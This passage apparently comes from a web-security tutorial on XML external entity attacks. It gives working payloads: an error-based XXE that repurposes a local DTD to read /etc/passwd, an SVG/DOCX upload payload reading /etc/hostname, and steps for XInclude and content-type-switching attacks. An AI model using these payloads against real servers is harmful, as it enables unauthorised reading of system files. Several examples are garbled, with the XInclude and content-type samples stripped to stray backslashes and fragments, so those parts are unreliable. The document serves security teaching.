\<!DOCTYPE foo [\<!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd">
\<!ENTITY % custom_entity '
\<!ENTITY % file SYSTEM "file:///etc/passwd">
\<!ENTITY % eval "\<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
'>
%local_dtd;
]>
Locating an existing DTD file to repurpose
Linux systems using the GNOME desktop environment often have a DTD file at /usr/share/yelp/dtd/docbookx.dtd
XInclude attacks
Some applications receive client-submitted data, embed it on the server-side into an XML document, and then parse the document.
In this situation, you cannot carry out a classic XXE attack, because you don't control the entire XML document and so cannot define or modify a DOCTYPE element. However, you might be able to use XInclude instead.
To perform an XInclude attack, you need to reference the XInclude namespace and provide the path to the file that you wish to include. For example:
\
\
XXE attacks via file upload
Some common file formats use XML or contain XML subcomponents. Examples of XML-based formats are office document formats like DOCX and image formats like SVG.
\<?xml version="1.0" standalone="yes"?>\<!DOCTYPE test [ \<!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>\
XXE attacks via modified content type
Most POST requests use a default content type that is generated by HTML forms, such as application/x-www-form-urlencoded. Some web sites expect to receive requests in this format but will tolerate other content types, including XML.
Change Content-Type: application/x-www-form-urlencoded to Content-Type: text/xml
Change foo=bar to \<?xml version="1.0" encoding="UTF-8"?>\bar\